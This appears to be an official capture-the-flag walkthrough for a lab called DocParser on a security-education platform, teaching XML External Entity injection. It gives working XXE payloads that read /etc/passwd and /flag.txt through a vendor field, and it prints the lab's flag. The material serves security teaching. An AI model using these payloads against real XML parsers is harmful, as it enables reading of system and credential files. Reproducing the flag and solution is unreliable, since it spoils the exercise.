HACKR.GG
hackr.gg — DocParser — XXE Injection Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

DocParser — XXE Injection

XXE Injection · XML External Entity (XXE)
Difficulty
Intermediate
Vuln class
XML External Entity (XXE)
Steps
3
// Objective
Inject an XXE payload via the vendor field in the XML document parser to read /etc/passwd.
// Tools required
Burp Suitecurl
// Step-by-step walkthrough
1
Intercept an XML upload request
Upload any document to DocParser. Intercept the request — the body is XML with a <vendor> field that you control.
Command / Input
POST /api/parse <?xml version="1.0"?> <doc><vendor>ACME Corp</vendor></doc>
2
Inject the XXE entity
Add an external entity declaration in the DOCTYPE and reference it in the vendor field.
Command / Input
<?xml version="1.0"?> <!DOCTYPE doc [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <doc><vendor>&xxe;</vendor></doc>
The &xxe; reference in <vendor> will be replaced with the file contents when the XML is parsed.
3
Read the flag
The server reflects the parsed vendor value in its response. /etc/passwd is returned, and /flag.txt contains the actual flag.
Command / Input
<?xml version="1.0"?> <!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///flag.txt">]> <doc><vendor>&xxe;</vendor></doc>
Output
HackrGG{xxe_3xt3rn4l_3nt1ty_f1l3_r34d}
// Flag
Flag value
HackrGG{xxe_3xt3rn4l_3nt1ty_f1l3_r34d}
Contents of /flag.txt returned via the XXE entity reference in the vendor field.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute